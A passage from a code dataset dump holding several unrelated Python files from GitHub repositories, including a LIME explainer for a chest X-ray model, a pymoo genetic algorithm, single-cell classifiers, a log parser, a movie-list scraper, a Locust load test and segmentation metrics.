/ 255)\nset = pd.read_csv(\"CheXpert-v1.0-small/csv/top/train_top_lateral.csv\")\ngenerator = datagen.flow_from_dataframe(\n dataframe=set,\n directory=\"\",\n x_col=\"Path\",\n y_col=types,\n classes=types,\n class_mode=\"raw\",\n color_mode=\"rgb\",\n target_size=(224, 224),\n shuffle=False,\n batch_size=8)\n\n\npath_model = os.path.join('saved_models/past/best_model_lateral_03_25_2020_21_11_32.h5')\nmodel = tf.keras.models.load_model(path_model, compile=False)\n# plot_model(model, to_file='model.png', show_shapes=True)\n\nx,y = generator.next()\nfor e in range(0,1):\n img = x[e]\n plt.imshow(img)\n plt.show()\n explainer = lime_image.LimeImageExplainer()\n explanation = explainer.explain_instance(img, model.predict, labels=types, hide_color=0, num_samples=1000, top_labels=5)\n img_tensor = img_to_tensor(img)\n res = model.predict(img_tensor)\n res = np.around(res)\n res = res.astype(int)[0]\n for i in explanation.top_labels: # Gets more interesting label positions\n temp, mask = explanation.get_image_and_mask(i, positive_only=False, num_features=5,\n hide_rest=False\n ,min_weight=0.15\n )\n plt.title(\"Predicted: %d, Original: %d, Pathologie: %s\"%(int(res[i]), int(y[e][i]),types[i]))\n # plt.imshow(x[e] / 2 + 0.5)\n plt.imshow(x[e])\n plt.imshow(mark_boundaries(temp, mask))\n plt.show()\n\n\n","repo_name":"carloslago/IntelligentXray","sub_path":"CheXpert/model_explanation.py","file_name":"model_explanation.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72592563529","text":"from pymoo.algorithms.soo.nonconvex.ga import GA\nfrom pymoo.core.problem import Problem\nfrom pymoo.optimize import minimize\nfrom pymoo.util.reference_direction import get_partition_closest_to_points, ReferenceDirectionFactory\n\n\nclass ReferenceDirectionGA(ReferenceDirectionFactory):\n\n def __init__(self,\n n_dim,\n n_points,\n fun,\n pop_size=20,\n n_gen=200,\n verbose=False,\n **kwargs):\n\n super().__init__(n_dim, **kwargs)\n\n self.n_points = n_points\n self.pop_size = pop_size\n self.n_gen = n_gen\n\n self.fun = fun\n self.verbose = verbose\n\n def _do(self):\n pop_size, n_gen = self.pop_size, self.n_gen\n n_points, n_dim, = self.n_points, self.n_dim\n fun = self.fun\n\n class MyProblem(Problem):\n\n def __init__(self):\n self.n_points = n_points\n self.n_dim = n_dim\n self.n_partitions = get_partition_closest_to_points(n_points, n_dim)\n\n super().__init__(n_var=n_points * n_dim,\n n_obj=1,\n xl=0.0,\n xu=1.0,\n elementwise_evaluation=True)\n\n def get_points(self, x):\n _x = x.reshape((self.n_points, self.n_dim)) ** 2\n _x = _x / _x.sum(axis=1)[:, None]\n return _x\n\n def _evaluate(self, x, out, *args, **kwargs):\n out[\"F\"] = fun(self.get_points(x))\n\n problem = MyProblem()\n\n algorithm = GA(pop_size=pop_size, eliminate_duplicates=True)\n\n res = minimize(problem,\n algorithm,\n termination=('n_gen', n_gen),\n verbose=True)\n\n ref_dirs = problem.get_points(res.X)\n return ref_dirs\n","repo_name":"anyoptimization/pymoo","sub_path":"pymoo/util/ref_dirs/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":1804,"dataset":"github-code","pt":"16"} +{"seq_id":"34431828035","text":"\"\"\"Going from Reaction Time (between presses) to Respiration Rate.\n\"\"\"\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport utils\n\nutils.load_matplotlib_settings()\nsubj_palette = 
utils.load_subject_palette()\n\n\nimport_fname = os.path.join(utils.Config.data_directory, \"derivatives\", \"bct-data_presses.csv\")\nexport_fname = os.path.join(utils.Config.data_directory, \"results\", \"bct-rt2rr.png\")\n\n\ndf = pd.read_csv(import_fname)\n\n\n# Flip data for easier access while plotting.\ntable = df.pivot(index=\"pc\", columns=\"participant_id\", values=\"rt\")\ntable = table.div(1000) # convert RTs to seconds\n\n# Plotting parameters.\nFIGSIZE = (3, 4)\nPLOT_KWARGS = dict(linewidth=.5, alpha=1)\n\n# The ylabels will be used to decide what data to plot.\nAXIS_PARAMS = [\n {\n \"ylabel\": \"Reaction time\\n(seconds)\",\n \"ymax\": 30,\n \"ymajorloc\": 5,\n },\n {\n \"ylabel\": \"smoothed\\n\" + \"Reaction time\\n(seconds)\",\n \"ymax\": 10,\n \"ymajorloc\": 2,\n },\n {\n \"ylabel\": \"smoothed\\n\" + r\"$\\mathrm{Respiration\\ rate,\\ }f_{R}$\" + \"\\n(breaths per minute)\",\n \"ymax\": 80,\n \"ymajorloc\": 20,\n },\n]\n\n\ncolors = [ subj_palette[s] if s in subj_palette else \"gray\" for s in table.columns ]\nxvals = table.index.values\n\nfig, axes = plt.subplots(nrows=3, figsize=FIGSIZE, sharex=True)\n\nfor ax, axdict in zip(axes, AXIS_PARAMS):\n ax.set_prop_cycle(plt.cycler(\"color\", colors))\n\n if \"Respiration\" in axdict[\"ylabel\"]:\n data = table.rolling(10).mean().rdiv(60).values\n elif \"smoothed\" in axdict[\"ylabel\"]:\n data = table.rolling(10).mean().values\n else:\n data = table.values\n\n ax.plot(xvals, data, **PLOT_KWARGS)\n ax.set_ylabel(axdict[\"ylabel\"])\n ax.set_ylim(0, axdict[\"ymax\"])\n ax.yaxis.set(major_locator=plt.MultipleLocator(axdict[\"ymajorloc\"]))\n\n ax.tick_params(which=\"both\", top=False)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"left\"].set_position((\"outward\", 5))\n ax.spines[\"right\"].set_position((\"outward\", 5))\n ax.spines[\"bottom\"].set_position((\"outward\", 5))\n ax.grid(axis=\"y\", clip_on=False)\n\nax.set_xbound(lower=0)\nax.set_xlabel(\"Press count\")\nax.xaxis.set(major_locator=plt.MultipleLocator(100),\n minor_locator=plt.MultipleLocator(20))\n\nfig.align_ylabels(axes)\n\n\nplt.savefig(export_fname)\nutils.save_hires_copies(export_fname)\nplt.close()\n","repo_name":"remrama/emp-intervention-pilot-a","sub_path":"plot-bct_rt2rr.py","file_name":"plot-bct_rt2rr.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20961270863","text":"##########################################################\n## ccAF: classifiersV3.py ##\n## ______ ______ __ __ ##\n## /\\ __ \\ /\\ ___\\ /\\ \\/\\ \\ ##\n## \\ \\ __ \\ \\ \\___ \\ \\ \\ \\_\\ \\ ##\n## \\ \\_\\ \\_\\ \\/\\_____\\ \\ \\_____\\ ##\n## \\/_/\\/_/ \\/_____/ \\/_____/ ##\n## @Developed by: Plaisier Lab ##\n## (https://plaisierlab.engineering.asu.edu/) ##\n## Arizona State University ##\n## 242 ISTB1, 550 E Orange St ##\n## Tempe, AZ 85281 ##\n## @Author: Chris Plaisier, Samantha O'Connor ##\n## @License: GNU GPLv3 ##\n## ##\n## If this program is used in your analysis please ##\n## mention who built it. Thanks. 
:-) ##\n##########################################################\n\n##########################################\n## Load Python packages for classifiers ##\n##########################################\n\n# General\nimport numpy as np\nimport pandas as pd\nimport os\nfrom scipy.sparse import isspmatrix\n\n# sklearn: Support Vector Machine (SVM) rejection\nfrom sklearn.svm import LinearSVC\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.ensemble import BaggingClassifier\n\n# sklearn: Random Forest (RF)\nfrom sklearn.ensemble import RandomForestClassifier\n\n# ACTINN\nimport actinn\n\n# scanpy: K-Nearest Neighbors (KNN)\nimport scanpy as sc\nimport anndata\n\n#################\n## Classifiers ##\n#################\n\nclass Classifier_SVMrej:\n \"\"\"A class designed to facilitate SVMrej classifier construction\n and use.\"\"\"\n def __init__(self, data, labels, cutoff = 0.7):\n self.data = data\n self.labels = labels\n self.cutoff = cutoff\n self.genes = data.var_names\n self.classifier = self.__build_classifier(data, labels)\n\n # Build classifier\n def __build_classifier(self, data, labels):\n train = self.__prep_data(data)\n Classifier = LinearSVC(max_iter = 100000)\n clf = CalibratedClassifierCV(Classifier)\n clf.fit(train, labels)\n return clf\n\n # Predict probability\n def predict_prob(self, newData):\n return np.max(self.classifier.predict_proba(newData), axis=1)\n\n # Prepare data\n def __prep_data(self, data):\n if isspmatrix(data.X):\n return pd.DataFrame(data.X.todense(), index = data.obs_names, columns = data.var_names)\n else:\n return pd.DataFrame(data.X, index = data.obs_names, columns = data.var_names)\n\n # Prepare test data for predicting\n def __prep_predict_data(self, test_data):\n missing = set(self.genes).difference(test_data.var_names)\n if isspmatrix(test_data.X):\n data = pd.DataFrame(test_data.X.todense(), index = test_data.obs_names, columns = test_data.var_names)\n else:\n data = pd.DataFrame(test_data.X, index = test_data.obs_names, columns = test_data.var_names)\n if len(missing)>0:\n data = pd.concat([data, pd.DataFrame(0,index=data.index, columns = missing)], axis=1)\n return data[list(self.genes)]\n\n # Predict labels with rejection\n def predict_labels(self, new_data, cutoff = None):\n pred_data = self.__prep_predict_data(new_data)\n labels = self.classifier.predict(pred_data)\n if cutoff == None and not self.cutoff == None:\n cutoff = self.cutoff\n if not cutoff == None:\n probs = self.predict_prob(pred_data)\n unlabeled = np.where(probs < cutoff)\n labels[unlabeled] = 'Unknown'\n return labels\n\n\nclass Classifier_KNN:\n \"\"\"A class designed to facilitate scanpy ingetst based\n K-nearest neighbor classifier construction and use.\"\"\"\n def __init__(self, data, label):\n self.data = data\n self.genes = data.var_names\n self.label = label\n # self.classifier = self.__build_classifier(data, labels)\n\n # Prepare test data for predicting\n def __prep_predict_data(self, test_data):\n missing = set(self.genes).difference(test_data.var_names)\n if len(missing)>0:\n data = pd.concat([pd.DataFrame(test_data.X, index=test_data.obs_names, columns=test_data.var_names), pd.DataFrame(0,index=test_data.obs_names, columns = missing)], axis=1)\n data = data[list(self.genes)]\n data_sc = anndata.AnnData(X=data.to_numpy())\n data_sc.var_names = data.columns\n data_sc.obs_names = data.index\n return data_sc\n else:\n return test_data\n \n # Predict labels\n def predict_labels(self, new_data):\n # 
Subset based on common gene names\n adata_query = self.__prep_predict_data(new_data)\n var_names = self.data.var_names.intersection(adata_query.var_names)\n adata_ref = self.data[:,var_names]\n adata_query = adata_query[:,var_names]\n\n # Run embedding anlaysis using subset\n sc.pp.pca(adata_ref)\n sc.pp.neighbors(adata_ref)\n sc.tl.umap(adata_ref)\n\n # Map the identifiers from the reference dataset to the query dataset\n sc.tl.ingest(adata_query, adata_ref, obs=self.label)\n\n # Save the results in whitfield data object\n return adata_query.obs[self.label]\n\n\nclass Classifier_RF:\n \"\"\"A class designed to facilitate RF classifier construction\n and use. Can also be used for \"\"\"\n def __init__(self, data, labels, cutoff = None):\n self.data = data\n self.genes = data.var_names\n self.labels = labels\n self.cutoff = cutoff\n self.classifier = self.__build_classifier()\n\n # Build classifier\n def __build_classifier(self):\n train = self.__prep_data(self.data)\n clf = RandomForestClassifier(n_estimators=500, oob_score=True)\n clf.fit(train, self.labels)\n return clf\n\n # Predict probability\n def predict_prob(self, newData):\n return np.max(self.classifier.predict_proba(newData), axis=1)\n \n # Prepare data\n def __prep_data(self, data):\n if isspmatrix(data.X):\n return pd.DataFrame(data.X.todense(), index = data.obs_names, columns = data.var_names)\n else:\n return pd.DataFrame(data.X, index = data.obs_names, columns = data.var_names)\n\n # Prepare test data for predicting\n def __prep_predict_data(self, test_data):\n missing = set(self.genes).difference(test_data.var_names)\n if isspmatrix(test_data.X):\n data = pd.DataFrame(test_data.X.todense(), index = test_data.obs_names, columns = test_data.var_names)\n else:\n data = pd.DataFrame(test_data.X, index = test_data.obs_names, columns = test_data.var_names)\n if len(missing)>0:\n data = pd.concat([data, pd.DataFrame(0,index=data.index, columns = missing)], axis=1)\n return data[list(self.genes)]\n \n # Predict labels with rejection\n def predict_labels(self, new_data, cutoff = None):\n pred_data = self.__prep_predict_data(new_data)\n labels = self.classifier.predict(pred_data)\n if cutoff == None and not self.cutoff == None:\n cutoff = self.cutoff\n if not cutoff == None:\n probs = self.predict_prob(pred_data)\n unlabeled = np.where(probs < cutoff)\n labels[unlabeled] = 'Unknown'\n return labels\n\n\nclass Classifier_ACTINN:\n \"\"\"A class designed to facilitate ACTINN classifier construction\n and use. 
Can also be used for \"\"\"\n def __init__(self, train, label, learning_rate = 0.0001, num_epochs = 200, minibatch_size = 128, print_cost = True, output_probability = False):\n self.train = train\n self.label = label\n self.learning_rate = learning_rate\n self.num_epochs = num_epochs\n self.minibatch_size = minibatch_size\n self.print_cost = print_cost\n self.output_probability = output_probability\n self.label = label\n self.classifier, self.label_to_type_dict, self.genes = self.__build_classifier()\n\n # Prepare data\n def __prep_data(self, data):\n # Make indicies unique for\n data.var_names_make_unique()\n # Remove all genes with zero counts\n sc.pp.filter_genes(data, min_cells=1)\n if isspmatrix(data.X):\n return pd.DataFrame(data.X.todense(), index = data.obs_names, columns = data.var_names).T\n else:\n return pd.DataFrame(data.X, index = data.obs_names, columns = data.var_names).T\n \n # Prepare test data for predicting\n def __prep_predict_data(self, data):\n missing = set(self.genes).difference(data.index)\n if len(missing)>0:\n data = pd.concat([data, pd.DataFrame(0,index=missing, columns = data.columns)])\n return data.loc[list(self.genes)]\n\n # Build classifier\n def __build_classifier(self):\n train = self.train\n # Convert into pandas DataFrame\n train_data = self.__prep_data(train)\n labels = self.train.obs[self.label]\n clf, label_to_type_dict, genes = actinn.train_model(train_data, labels, learning_rate = self.learning_rate, num_epochs = self.num_epochs, minibatch_size = self.minibatch_size, print_cost = self.print_cost)\n return clf, label_to_type_dict, genes\n\n # Predict labels with rejection\n def predict_labels(self, newData):\n test_data = self.__prep_data(newData)\n pred_data = self.__prep_predict_data(test_data)\n labels = actinn.predict_new_data(pred_data, self.classifier, self.label_to_type_dict, self.genes)\n return list(labels['celltype'])\n\n # Predict labels with rejection\n def predict_probs(self, newData, axis = -1):\n test_data = self.__prep_data(newData)\n pred_data = self.__prep_predict_data(test_data)\n probs = actinn.predict_probabilities(pred_data, self.classifier, self.genes, axis=axis)\n probs.index = pd.Index([self.label_to_type_dict[i] for i in list(probs.index)])\n return probs\n\n","repo_name":"plaisier-lab/U5_hNSC_Neural_G0","sub_path":"classifiersV3.py","file_name":"classifiersV3.py","file_ext":"py","file_size_in_byte":10206,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"37906616698","text":"# ABB.Ability.IoTEdge.EdgeAgent.Services.CommonDiagnosticCheckService[0]\n# [2022-10-21T13:23:16.4215035Z]\n# : Diagnostic Check is pass. 
{\"ENABLE_ ...\n\nimport re\n\ninput_dir = '/home/javarotti/Data/ParsedData/ProxyPartial/' # The input directory of log file\noutput_dir = '/home/javarotti/Data/ParsedData/ProxyPartial/' # The output directory of parsing results\nlog_file = 'abb-edge-19-proxy-5.log' # The input log file name\nstep1tag = 'step1-'\nstep2tag = 'step2-'\n\ndef processFile(fileName):\n try:\n with open(fileName) as file:\n lines = file.readlines()\n lines = [line.rstrip() for line in lines]\n return lines\n except Exception as e: \n print('Error reading file' + fileName + \": \" + str(e))\n return []\n\ndef extractPattern(inputList, outputList, regExpression):\n engine = re.compile(regExpression)\n for item in inputList:\n match = engine.match(item)#.replace(' ',''))\n if(match != None):\n trash = match.group(1)\n component = match.group(2).strip()\n timestamp = match.group(3).replace('[','').replace(']','').strip()\n content = removeMultiSpace(match.group(4).removeprefix(': '))\n \n outputList.append(timestamp + ';' + component + ':' + content)\n\ndef removeMultiSpace(input):\n return re.sub(' +', ' ', input)\n\ndef extractTimeStamp(input):\n return input.replace('[','').replace(']','').strip()\n\nresult = processFile(input_dir + step1tag + log_file)\nlogList = []\nextractPattern(result, logList, '(.*?:)(.*\\[[0-9]\\])(\\s*\\[.*T.*Z\\])(.*)')\n\nfile = open(output_dir + step2tag + log_file, \"w+\")\nfor log in logList:\n file.write(str(log) + '\\n')\nfile.close()\n","repo_name":"alexjavarotti/TCCPUCMinas","sub_path":"Parsing/ProxyAdaptor/step2-proxy.py","file_name":"step2-proxy.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29137805628","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: amihso\n# Date : 2022/04/14 10:47\n\n# get 请求豆瓣电影前10页\n\nimport urllib.parse\nimport urllib.request\n\n\ndef create_request(pageNum):\n baseUrl = 'https://movie.douban.com/j/chart/top_list?type=1&interval_id=100%3A90&action='\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36',\n }\n data = {\n 'start': (pageNum - 1) * 20,\n 'limit': 20\n }\n data = urllib.parse.urlencode(data)\n url = baseUrl + data\n return urllib.request.Request(url=url, headers=headers)\n\n\ndef get_content(request):\n return urllib.request.urlopen(request).read().decode('utf-8')\n\n\ndef download(pageNum, content):\n with open('resource/douban' + str(pageNum) + '.json', 'w', encoding='utf-8') as f:\n f.write(content)\n\n\nif __name__ == '__main__':\n for pageNum in range(1, 11):\n request = create_request(pageNum)\n content = get_content(request)\n download(pageNum, content)\n","repo_name":"KnIdIShe/someProjects","sub_path":"PythonSpider/062_urllib_ajax_getDoubanMoviePage1-10.py","file_name":"062_urllib_ajax_getDoubanMoviePage1-10.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25868401243","text":"import json\nimport logging\n\nfrom locust import HttpUser, between, events, task\nfrom locust.runners import MasterRunner\nfrom locust.stats import console_logger\nfrom locust_plugins.users import RestUser\n\nfrom sample.database import setup_initial_data, teardown_database\n\n# You can suppress tables in log by disabling stats logger\nconsole_logger.disabled = True\n\nlogger = logging.getLogger(__name__)\n\nwith open(\"users.json\", 
\"r\") as f:\n USERS = json.load(f)\n\n\n@events.test_start.add_listener\ndef on_test_start(environment, **kwargs):\n if isinstance(environment.runner, MasterRunner):\n logger.info(\"Setting up database...\")\n setup_initial_data()\n logger.info(\"Finished setting up database\")\n else:\n logger.info(\"Starting worker setup\")\n # Do worker node setup\n logger.info(\"Finished worker setup\")\n\n\n@events.test_stop.add_listener\ndef on_test_stop(environment, **kwargs):\n if isinstance(environment.runner, MasterRunner):\n logger.info(\"Tearing down from master\")\n teardown_database()\n logger.info(\"Finished tearing down from master\")\n else:\n logger.info(\"Tearing down from worker\")\n # Do worker node setup\n logger.info(\"Finish tearing down from worker\")\n\n\nclass AuthenticatedUser(HttpUser):\n\n wait_time = between(1, 5)\n\n def on_start(self):\n if len(USERS) > 0:\n user = USERS.pop()\n logger.info(f\"popped user: {user}\")\n self.name = user[\"name\"]\n self.client.post(\n \"/auth\",\n json={\n \"name\": user[\"name\"],\n \"password\": user[\"password\"],\n },\n )\n\n @task\n def get_name(self):\n with self.client.get(\"/\") as resp:\n if resp.json()[\"name\"] != self.name:\n logger.warning(\"not match\")\n resp.failure()\n","repo_name":"TatchNicolas/pyconjp2021-locust","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"35498886287","text":"from torch.functional import Tensor\r\nfrom general_utils import log\r\nfrom collections import defaultdict\r\nimport numpy as np\r\n\r\nimport torch\r\nfrom torch.nn import functional as nnf\r\n\r\n\r\nclass BaseMetric(object):\r\n\r\n def __init__(self, metric_names, pred_range=None, gt_index=0, pred_index=0, eval_intermediate=True,\r\n eval_validation=True):\r\n self._names = tuple(metric_names)\r\n self._eval_intermediate = eval_intermediate\r\n self._eval_validation = eval_validation\r\n\r\n self._pred_range = pred_range\r\n self._pred_index = pred_index\r\n self._gt_index = gt_index\r\n\r\n self.predictions = []\r\n self.ground_truths = []\r\n\r\n def eval_intermediate(self):\r\n return self._eval_intermediate\r\n\r\n def eval_validation(self):\r\n return self._eval_validation\r\n\r\n def names(self):\r\n return self._names\r\n\r\n def add(self, predictions, ground_truth):\r\n raise NotImplementedError\r\n\r\n def value(self):\r\n raise NotImplementedError\r\n\r\n def scores(self):\r\n # similar to value but returns dict\r\n value = self.value()\r\n if type(value) == dict:\r\n return value\r\n else:\r\n assert type(value) in {list, tuple}\r\n return list(zip(self.names(), self.value()))\r\n\r\n def _get_pred_gt(self, predictions, ground_truth):\r\n pred = predictions[self._pred_index]\r\n gt = ground_truth[self._gt_index]\r\n\r\n if self._pred_range is not None:\r\n pred = pred[:, self._pred_range[0]: self._pred_range[1]]\r\n\r\n return pred, gt\r\n\r\n\r\nclass FixedIntervalMetrics(BaseMetric):\r\n\r\n def __init__(self, sigmoid=False, ignore_mask=False, resize_to=None, \r\n resize_pred=None, n_values=51, custom_threshold=None):\r\n\r\n\r\n super().__init__(('ap', 'best_fgiou', 'best_miou', 'fgiou0.5', 'fgiou0.1', 'mean_iou_0p5', 'mean_iou_0p1', 'best_biniou', 'biniou_0.5', 'fgiou_thresh'))\r\n self.intersections = []\r\n self.unions = []\r\n # self.threshold = threshold\r\n self.sigmoid = sigmoid\r\n self.resize_to = resize_to\r\n self.resize_pred = resize_pred # resize prediction 
to match ground truth\r\n self.class_count = defaultdict(lambda: 0)\r\n self.per_class = defaultdict(lambda : [0,0])\r\n self.ignore_mask = ignore_mask\r\n self.custom_threshold = custom_threshold\r\n\r\n self.scores_ap = []\r\n self.scores_iou = []\r\n self.gts, self.preds = [], []\r\n self.classes = []\r\n\r\n # [1:-1] ignores 0 and 1\r\n self.threshold_values = np.linspace(0, 1, n_values)[1:-1]\r\n\r\n self.metrics = dict(tp=[], fp=[], fn=[], tn=[])\r\n\r\n def add(self, pred, gt):\r\n \r\n pred_batch = pred[0].cpu()\r\n\r\n if self.sigmoid:\r\n pred_batch = torch.sigmoid(pred_batch)\r\n\r\n gt_batch = gt[0].cpu()\r\n mask_batch = gt[1] if len(gt) > 1 and not self.ignore_mask and gt[1].numel() > 0 else ([None] * len(pred_batch))\r\n cls_batch = gt[2] if len(gt) > 2 else [None] * len(pred_batch)\r\n\r\n if self.resize_to is not None:\r\n gt_batch = nnf.interpolate(gt_batch, self.resize_to, mode='nearest')\r\n pred_batch = nnf.interpolate(pred_batch, self.resize_to, mode='bilinear', align_corners=False)\r\n \r\n if isinstance(cls_batch, torch.Tensor):\r\n cls_batch = cls_batch.cpu().numpy().tolist()\r\n\r\n assert len(gt_batch) == len(pred_batch) == len(cls_batch), f'{len(gt_batch)} {len(pred_batch)} {len(cls_batch)}'\r\n\r\n for predictions, ground_truth, mask, cls in zip(pred_batch, gt_batch, mask_batch, cls_batch):\r\n\r\n if self.resize_pred:\r\n predictions = nnf.interpolate(predictions.unsqueeze(0).float(), size=ground_truth.size()[-2:], mode='bilinear', align_corners=True)\r\n\r\n p = predictions.flatten()\r\n g = ground_truth.flatten()\r\n\r\n assert len(p) == len(g)\r\n\r\n if mask is not None:\r\n m = mask.flatten().bool()\r\n p = p[m]\r\n g = g[m]\r\n\r\n p_sorted = p.sort()\r\n p = p_sorted.values\r\n g = g[p_sorted.indices]\r\n\r\n tps, fps, fns, tns = [], [], [], []\r\n for thresh in self.threshold_values:\r\n\r\n valid = torch.where(p > thresh)[0]\r\n if len(valid) > 0:\r\n n = int(valid[0])\r\n else:\r\n n = len(g)\r\n\r\n fn = int(g[:n].sum())\r\n tp = int(g[n:].sum())\r\n fns += [fn]\r\n tns += [n - fn]\r\n tps += [tp]\r\n fps += [len(g) - n - tp]\r\n\r\n self.metrics['tp'] += [tps]\r\n self.metrics['fp'] += [fps]\r\n self.metrics['fn'] += [fns]\r\n self.metrics['tn'] += [tns]\r\n\r\n self.classes += [cls.item() if isinstance(cls, torch.Tensor) else cls]\r\n\r\n def value(self):\r\n\r\n import time\r\n t_start = time.time() \r\n\r\n if set(self.classes) == set([None]):\r\n all_classes = None\r\n log.warning('classes were not provided, cannot compute mIoU')\r\n else:\r\n all_classes = set(int(c) for c in self.classes)\r\n # log.info(f'compute metrics for {len(all_classes)} classes')\r\n\r\n summed = {k: [sum([self.metrics[k][i][j] \r\n for i in range(len(self.metrics[k]))])\r\n for j in range(len(self.threshold_values))]\r\n for k in self.metrics.keys()}\r\n\r\n if all_classes is not None:\r\n\r\n assert len(self.classes) == len(self.metrics['tp']) == len(self.metrics['fn'])\r\n # group by class\r\n metrics_by_class = {c: {k: [] for k in self.metrics.keys()} for c in all_classes}\r\n for i in range(len(self.metrics['tp'])):\r\n for k in self.metrics.keys():\r\n metrics_by_class[self.classes[i]][k] += [self.metrics[k][i]]\r\n \r\n # sum over all instances within the classes\r\n summed_by_cls = {k: {c: np.array(metrics_by_class[c][k]).sum(0).tolist() for c in all_classes} for k in self.metrics.keys()}\r\n\r\n\r\n # Compute average precision\r\n\r\n assert (np.array(summed['fp']) + np.array(summed['tp']) ).sum(), 'no predictions is made'\r\n\r\n # only consider values where 
a prediction is made\r\n precisions = [summed['tp'][j] / (1 + summed['tp'][j] + summed['fp'][j]) for j in range(len(self.threshold_values))\r\n if summed['tp'][j] + summed['fp'][j] > 0]\r\n recalls = [summed['tp'][j] / (1 + summed['tp'][j] + summed['fn'][j]) for j in range(len(self.threshold_values))\r\n if summed['tp'][j] + summed['fp'][j] > 0]\r\n\r\n # remove duplicate recall-precision-pairs (and sort by recall value)\r\n recalls, precisions = zip(*sorted(list(set(zip(recalls, precisions))), key=lambda x: x[0]))\r\n\r\n from scipy.integrate import simps\r\n ap = simps(precisions, recalls)\r\n\r\n # Compute best IoU\r\n fgiou_scores = [summed['tp'][j] / (1 + summed['tp'][j] + summed['fp'][j] + summed['fn'][j]) for j in range(len(self.threshold_values))]\r\n\r\n biniou_scores = [\r\n 0.5*(summed['tp'][j] / (1 + summed['tp'][j] + summed['fp'][j] + summed['fn'][j])) + \r\n 0.5*(summed['tn'][j] / (1 + summed['tn'][j] + summed['fn'][j] + summed['fp'][j])) \r\n for j in range(len(self.threshold_values))\r\n ]\r\n \r\n index_0p5 = self.threshold_values.tolist().index(0.5)\r\n index_0p1 = self.threshold_values.tolist().index(0.1)\r\n index_0p2 = self.threshold_values.tolist().index(0.2)\r\n index_0p3 = self.threshold_values.tolist().index(0.3)\r\n\r\n if self.custom_threshold is not None:\r\n index_ct = self.threshold_values.tolist().index(self.custom_threshold)\r\n\r\n if all_classes is not None:\r\n # mean IoU\r\n mean_ious = [np.mean([summed_by_cls['tp'][c][j] / (1 + summed_by_cls['tp'][c][j] + summed_by_cls['fp'][c][j] + summed_by_cls['fn'][c][j]) \r\n for c in all_classes])\r\n for j in range(len(self.threshold_values))]\r\n\r\n mean_iou_dict = {\r\n 'miou_best': max(mean_ious) if all_classes is not None else None,\r\n 'miou_0.5': mean_ious[index_0p5] if all_classes is not None else None,\r\n 'miou_0.1': mean_ious[index_0p1] if all_classes is not None else None,\r\n 'miou_0.2': mean_ious[index_0p2] if all_classes is not None else None,\r\n 'miou_0.3': mean_ious[index_0p3] if all_classes is not None else None,\r\n 'miou_best_t': self.threshold_values[np.argmax(mean_ious)],\r\n 'mean_iou_ct': mean_ious[index_ct] if all_classes is not None and self.custom_threshold is not None else None,\r\n 'mean_iou_scores': mean_ious,\r\n }\r\n\r\n print(f'metric computation on {(len(all_classes) if all_classes is not None else \"no\")} classes took {time.time() - t_start:.1f}s')\r\n\r\n return {\r\n 'ap': ap,\r\n\r\n # fgiou\r\n 'fgiou_best': max(fgiou_scores),\r\n 'fgiou_0.5': fgiou_scores[index_0p5],\r\n 'fgiou_0.1': fgiou_scores[index_0p1],\r\n 'fgiou_0.2': fgiou_scores[index_0p2],\r\n 'fgiou_0.3': fgiou_scores[index_0p3],\r\n 'fgiou_best_t': self.threshold_values[np.argmax(fgiou_scores)],\r\n\r\n # mean iou\r\n\r\n\r\n # biniou\r\n 'biniou_best': max(biniou_scores),\r\n 'biniou_0.5': biniou_scores[index_0p5],\r\n 'biniou_0.1': biniou_scores[index_0p1],\r\n 'biniou_0.2': biniou_scores[index_0p2],\r\n 'biniou_0.3': biniou_scores[index_0p3],\r\n 'biniou_best_t': self.threshold_values[np.argmax(biniou_scores)],\r\n\r\n # custom threshold\r\n 'fgiou_ct': fgiou_scores[index_ct] if self.custom_threshold is not None else None,\r\n 'biniou_ct': biniou_scores[index_ct] if self.custom_threshold is not None else None,\r\n 'ct': self.custom_threshold,\r\n\r\n # statistics\r\n 'fgiou_scores': fgiou_scores,\r\n 'biniou_scores': biniou_scores,\r\n 'precision_recall_curve': sorted(list(set(zip(recalls, precisions)))),\r\n 'summed_statistics': summed,\r\n 'summed_by_cls_statistics': summed_by_cls,\r\n\r\n 
